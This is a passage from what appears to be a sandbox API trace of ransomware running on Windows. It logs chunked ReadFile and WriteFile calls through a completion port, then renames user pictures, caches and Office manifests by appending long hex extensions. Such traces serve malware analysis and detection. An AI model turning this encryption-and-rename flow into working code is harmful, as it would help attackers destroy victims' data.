nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0167.838] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0168.387] WriteFile (in: hFile=0x5b0, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0168.394] RtlInterlockedCompareExchange64 () returned 0xffffffff [0168.394] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0168.397] WriteFile (in: hFile=0x5ac, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0168.398] RtlInterlockedCompareExchange64 () returned 0x0 [0168.398] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0169.333] ReadFile (in: hFile=0x5b0, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0169.348] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0169.349] WriteFile (in: hFile=0x5cc, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0169.350] RtlInterlockedCompareExchange64 () returned 0x0 [0169.350] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0170.395] NtQueryObject (in: Handle=0x5cc, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x73e00f8, ReturnLength=0x6fef7f4) returned 0x0 [0170.396] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt", lpString2=".084EC9DD8CF717B8E16F87A7E5B6552DE00984D275645779CDE822675991490B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.084EC9DD8CF717B8E16F87A7E5B6552DE00984D275645779CDE822675991490B") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.084EC9DD8CF717B8E16F87A7E5B6552DE00984D275645779CDE822675991490B" [0170.396] GetProcessHeap () returned 0x270000 [0170.396] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x14a) returned 0x4258820 [0170.397] NtSetInformationFile (FileHandle=0x5cc, IoStatusBlock=0x6fef7e4, FileInformation=0x4258820, Length=0x14a, FileInformationClass=0xa) returned 0x0 [0170.404] CloseHandle (hObject=0x5cc) returned 1 [0170.407] GetProcessHeap () returned 0x270000 [0170.410] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.410] RtlInterlockedCompareExchange64 () returned 0x1 [0170.410] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0170.855] ReadFile (in: hFile=0x604, lpBuffer=0x75ca140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa008 | out: lpBuffer=0x75ca140, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa008) returned 0x0 [0170.902] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0170.903] WriteFile (in: hFile=0x5b0, lpBuffer=0x78e1140, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78c1008 | out: lpBuffer=0x78e1140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78c1008) returned 0x0 [0170.912] RtlInterlockedCompareExchange64 () returned 0xffffffff [0170.913] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0170.915] NtQueryObject (in: Handle=0x5cc, ObjectInformationClass=0x1, ObjectInformation=0x78e9210, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x78e9210, ReturnLength=0x6fef7f4) returned 0x0 [0170.917] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg", lpString2=".5A2C3312D147DEAFA91111A6A29C93FD69B83FD6BCDB66BADF850954018B872B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.5A2C3312D147DEAFA91111A6A29C93FD69B83FD6BCDB66BADF850954018B872B") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.5A2C3312D147DEAFA91111A6A29C93FD69B83FD6BCDB66BADF850954018B872B" [0170.917] GetProcessHeap () returned 0x270000 [0170.917] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x152) returned 0x4337f70 [0170.918] NtSetInformationFile (FileHandle=0x5cc, IoStatusBlock=0x6fef7e4, FileInformation=0x4337f70, Length=0x152, FileInformationClass=0xa) returned 0x0 [0170.920] CloseHandle (hObject=0x5cc) returned 1 [0170.922] GetProcessHeap () returned 0x270000 [0170.923] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x78e9160 | out: hHeap=0x270000) returned 1 [0170.924] RtlInterlockedCompareExchange64 () returned 0x1 [0170.924] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0170.927] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x76b8fa8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76b8fa8, ReturnLength=0x6fef7f4) returned 0x0 [0170.929] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg", lpString2=".F3612BF053695804501DEF8FD48CF15AC759B61FE0F7FC338A7A1CFAC7E08134" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.F3612BF053695804501DEF8FD48CF15AC759B61FE0F7FC338A7A1CFAC7E08134") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.F3612BF053695804501DEF8FD48CF15AC759B61FE0F7FC338A7A1CFAC7E08134" [0170.929] GetProcessHeap () returned 0x270000 [0170.929] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x154) returned 0x43380d8 [0170.929] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x6fef7e4, FileInformation=0x43380d8, Length=0x154, FileInformationClass=0xa) returned 0x0 [0170.931] CloseHandle (hObject=0x590) returned 1 [0170.932] GetProcessHeap () returned 0x270000 [0170.934] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76b8ef8 | out: hHeap=0x270000) returned 1 [0170.942] RtlInterlockedCompareExchange64 () returned 0x1 [0170.942] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0170.947] NtQueryObject (in: Handle=0x5dc, ObjectInformationClass=0x1, ObjectInformation=0x76e1100, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76e1100, ReturnLength=0x6fef7f4) returned 0x0 [0170.949] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg", lpString2=".5CF1053D65E2C3246FD0906DB18C4C56DB19563759EC07FECF9840E625DB835A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.5CF1053D65E2C3246FD0906DB18C4C56DB19563759EC07FECF9840E625DB835A") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.5CF1053D65E2C3246FD0906DB18C4C56DB19563759EC07FECF9840E625DB835A" [0170.949] GetProcessHeap () returned 0x270000 [0170.949] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x160) returned 0x7733cb8 [0170.949] NtSetInformationFile (FileHandle=0x5dc, IoStatusBlock=0x6fef7e4, FileInformation=0x7733cb8, Length=0x160, FileInformationClass=0xa) returned 0x0 [0170.951] CloseHandle (hObject=0x5dc) returned 1 [0170.952] GetProcessHeap () returned 0x270000 [0170.953] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76e1050 | out: hHeap=0x270000) returned 1 [0170.956] RtlInterlockedCompareExchange64 () returned 0x1 [0170.956] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0170.959] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x750a500, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x750a500, ReturnLength=0x6fef7f4) returned 0x0 [0170.961] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg", lpString2=".0C31C8CCEACD412DE9B2C5C2A3CC8059409C9A0848EF2171A7A4782610D41E05" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.0C31C8CCEACD412DE9B2C5C2A3CC8059409C9A0848EF2171A7A4782610D41E05") returned="\\Device\\HarddiskVolume1\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.0C31C8CCEACD412DE9B2C5C2A3CC8059409C9A0848EF2171A7A4782610D41E05" [0170.961] GetProcessHeap () returned 0x270000 [0170.961] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x162) returned 0x7421af0 [0170.961] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x6fef7e4, FileInformation=0x7421af0, Length=0x162, FileInformationClass=0xa) returned 0x0 [0170.963] CloseHandle (hObject=0x58c) returned 1 [0170.964] GetProcessHeap () returned 0x270000 [0170.965] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x750a450 | out: hHeap=0x270000) returned 1 [0170.968] RtlInterlockedCompareExchange64 () returned 0x1 [0170.968] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0171.606] ReadFile (in: hFile=0x5fc, lpBuffer=0x75ca140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa008 | out: lpBuffer=0x75ca140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75aa008) returned 1 [0171.606] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0171.607] WriteFile (in: hFile=0x58c, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0171.823] RtlInterlockedCompareExchange64 () returned 0x0 [0171.823] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0171.824] WriteFile (in: hFile=0x594, lpBuffer=0x77292e0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77091a8 | out: lpBuffer=0x77292e0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77091a8) returned 1 [0171.835] RtlInterlockedCompareExchange64 () returned 0x6 [0171.835] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0172.028] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x76b8fa8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x76b8fa8, ReturnLength=0x6fef7f4) returned 0x0 [0172.029] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", lpString2=".FC1BD111C71A8B1F0B71C386CC3EF35B50C2A1B26A248E04A090127B868F465D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.FC1BD111C71A8B1F0B71C386CC3EF35B50C2A1B26A248E04A090127B868F465D") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.FC1BD111C71A8B1F0B71C386CC3EF35B50C2A1B26A248E04A090127B868F465D" [0172.029] GetProcessHeap () returned 0x270000 [0172.029] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12a) returned 0x4333688 [0172.029] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x6fef7e4, FileInformation=0x4333688, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0172.123] CloseHandle (hObject=0x5b0) returned 1 [0172.124] GetProcessHeap () returned 0x270000 [0172.126] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76b8ef8 | out: hHeap=0x270000) returned 1 [0172.126] RtlInterlockedCompareExchange64 () returned 0x5 [0172.126] GetQueuedCompletionStatus (CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff) Thread: id = 106 os_tid = 0xae4 [0142.350] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0156.306] ReadFile (in: hFile=0x5a4, lpBuffer=0x75323f0, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x0, lpOverlapped=0x75122b8 | out: lpBuffer=0x75323f0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75122b8) returned 1 [0156.307] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0156.318] WriteFile (in: hFile=0x5a4, lpBuffer=0x75323f0*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75122b8 | out: lpBuffer=0x75323f0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75122b8) returned 1 [0156.320] RtlInterlockedCompareExchange64 () returned 0x2 [0156.320] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0156.372] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x7512368, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x7512368, ReturnLength=0x708f9e4) returned 0x0 [0156.374] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", lpString2=".37D8AE5D9E043E04B0F06ACDB780EC47802FF6274B1F40F4AE8547AC9670FB36" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.37D8AE5D9E043E04B0F06ACDB780EC47802FF6274B1F40F4AE8547AC9670FB36") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.37D8AE5D9E043E04B0F06ACDB780EC47802FF6274B1F40F4AE8547AC9670FB36" [0156.374] GetProcessHeap () returned 0x270000 [0156.374] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1b4) returned 0x42fc668 [0156.374] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x708f9d4, FileInformation=0x42fc668, Length=0x1b4, FileInformationClass=0xa) returned 0x0 [0156.376] CloseHandle (hObject=0x5a4) returned 1 [0156.381] GetProcessHeap () returned 0x270000 [0156.383] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75122b8 | out: hHeap=0x270000) returned 1 [0156.385] RtlInterlockedCompareExchange64 () returned 0x3 [0156.385] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0156.512] ReadFile (in: hFile=0x5a4, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0156.512] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0156.513] WriteFile (in: hFile=0x5a4, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x5e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0156.514] RtlInterlockedCompareExchange64 () returned 0x0 [0156.514] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0156.515] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x744a270, ReturnLength=0x708f9e4) returned 0x0 [0156.517] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml", lpString2=".CFB4B3B14DCD9AC2D031BB88129D214A1C78681E56028B5EF98C3A12B29E1C1A" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.CFB4B3B14DCD9AC2D031BB88129D214A1C78681E56028B5EF98C3A12B29E1C1A") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.CFB4B3B14DCD9AC2D031BB88129D214A1C78681E56028B5EF98C3A12B29E1C1A" [0156.517] GetProcessHeap () returned 0x270000 [0156.517] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a8) returned 0x4278880 [0156.517] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x708f9d4, FileInformation=0x4278880, Length=0x1a8, FileInformationClass=0xa) returned 0x0 [0156.518] CloseHandle (hObject=0x5a4) returned 1 [0156.521] GetProcessHeap () returned 0x270000 [0156.523] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0156.524] RtlInterlockedCompareExchange64 () returned 0x2 [0156.524] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0158.516] WriteFile (in: hFile=0x5a4, lpBuffer=0x7410188*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73f0050 | out: lpBuffer=0x7410188*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73f0050) returned 1 [0158.519] RtlInterlockedCompareExchange64 () returned 0x1 [0158.519] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0158.529] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x73f0100, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x73f0100, ReturnLength=0x708f9e4) returned 0x0 [0158.530] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab", lpString2=".D11358EA808524D3D6008A62E8739B529E74AC1D8557AD9C7DDB1837BF6C7D65" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.D11358EA808524D3D6008A62E8739B529E74AC1D8557AD9C7DDB1837BF6C7D65") returned="\\Device\\HarddiskVolume1\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.D11358EA808524D3D6008A62E8739B529E74AC1D8557AD9C7DDB1837BF6C7D65" [0158.530] GetProcessHeap () returned 0x270000 [0158.531] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a8) returned 0x4278da8 [0158.531] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x708f9d4, FileInformation=0x4278da8, Length=0x1a8, FileInformationClass=0xa) returned 0x0 [0158.647] CloseHandle (hObject=0x5a4) returned 1 [0158.671] GetProcessHeap () returned 0x270000 [0158.672] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0158.679] RtlInterlockedCompareExchange64 () returned 0x2 [0158.679] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.213] ReadFile (in: hFile=0x58c, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0159.219] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x708f9f0, lpCompletionKey=0x708f9ec, lpOverlapped=0x708f9e8) returned 1 [0159.221] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x708f9e4 | out: ObjectInformation=0x73e00f8, ReturnLength=0x708f9e4) returned 0x0 [0159.223] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\IconCache.db", lpString2=".BC5A1C0E9CEA032389357EC4834B814776F2FE099E265E9B6DDE5917131B4801" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\IconCache.db.BC5A1C0E9CEA032389357EC4834B814776F2FE099E265E9B6DDE5917131B4801") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\IconCache.db.BC5A1C0E9CEA032389357EC4834B814776F2FE099E265E9B6DDE5917131B4801" [0159.223] GetProcessHeap () returned 0x270000 [0159.223] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11a) returned 0x4275be8 [0159.223] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x708f9d4, FileInformation=0x4275be8, Length=0x11a, 